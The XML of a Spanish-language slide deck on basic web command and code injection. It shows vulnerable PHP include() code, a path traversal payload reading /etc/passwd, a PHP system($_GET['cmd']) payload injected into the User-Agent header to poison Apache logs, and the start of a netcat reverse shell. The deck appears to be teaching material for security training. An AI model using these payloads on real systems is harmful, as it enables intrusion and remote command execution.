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4" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="268" r:id="rId8"/>
    <p:sldId id="271" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="272" r:id="rId13"/>
    <p:sldId id="273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35F"/>
    <a:srgbClr val="FFDBB8"/>
    <a:srgbClr val="222F41"/>
    <a:srgbClr val="600900"/>
    <a:srgbClr val="D64923"/>
    <a:srgbClr val="23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9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4744-3FC5-4742-B39B-0429189C737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DF87-4548-4BC4-950C-05E6F510E4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k9-sec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Command_Injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Code_Inj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function.eval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Técnicas básicas de Inyección de comandos e Inyección de código (Web)</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR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527473" cy="4315890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-CR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bryan Alfaro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ingeniero en Seguridad Informática</a:t>
            </a:r>
          </a:p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VK9 Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://vk9-sec.com</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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Experiencia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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Soporte en Cisco</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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Administración de servidores (Windows, Unix, Linux, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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Infraestructura</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFDBB8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-CR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198922" cy="431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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F6B35F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RCE Inyección de código </a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F6B35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En la misma web app, ahora tenemos una caja con opciones para ver cierta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> del sistema como memoria y CPU.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Errores dentro de este código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No inspeccionar la data que ingreso el usuario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> para llamar un archivo y pasar el contenido de la variable no inspeccionado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Ciertos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con READ Access, en los cuales vamos a inyectar código</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="es-CR" sz="1800" dirty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RCE Inyección de código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DBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$file = $_GET['log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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DBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/'. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8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DBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como la no ha </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sido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inspeccionada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>algunos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caracteres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>han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sido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reemplazados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>puestos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en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lista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negra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>somos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libres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escribir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> lo que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nosotros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queramos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8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Por ejemplo si seleccionamos “Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, el valor que se va a enviar al código de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> es “access.log”. La aplicación lo procesa de esta manera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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/apache2/access.log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Nosotros en este caso podemos jugar con “..” y “.” en Linux que son para moverse entre directorios, y leer otros archivos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$file = ../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/log/apache2/../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1800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RCE Inyección de código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Ahora que sabemos que podemos navegar entre el Sistema, podemos revisar si algunos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tienen READ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> para nuestro usuario.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En este caso voy a usar access.log, ya que se que puedo leer ese. Cada vez que se ingrese a el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> apache escribe el acceso en este file. Este log incluye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IP origen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> utilizado (POST/GET/HEAD)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Directorio/archive visitado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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; HTTP response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1800" dirty="0" smtClean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r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1800" dirty="0" smtClean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DBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ejemplo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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192.168.0.10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- - [24/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>May</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/2020:08:41:44 -0600] "GET /dc506/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lfi-viewer.php?log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access.log&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1" 200 719 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gecko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/20100101 Firefox/68.0"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RCE Inyección de código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Sabiendo que el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> se guarda en el log vamos a inyectar un código en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, porque sabemos que la aplicación es capaz de interpretarlo.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s-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vamos a capturar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con un proxy web (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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s-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inyectamos la siguiente línea en el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-agent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Original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err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gecko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/20100101 Firefox/68.0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Modificación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err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Mozilla/5.0 &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>']); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gecko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/20100101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firefox/68.0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3. Ahora en la línea que muestra el GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vamos a incluir la nueva variable “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” y correremos un comando “id”.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1800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RCE Inyección de código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Ahora que pudimos ejecutar el comando de sistema “id” sabemos que podemos correr otros.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Intentemos una conexión reversa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Computadora atacante (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 4444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Browser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http://127.0.0.1:8080/dc506/lfi-viewer.php?log=access.log&amp;cmd=nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFDBB8"/>
                </a:solidFill>
              </a:rPr>
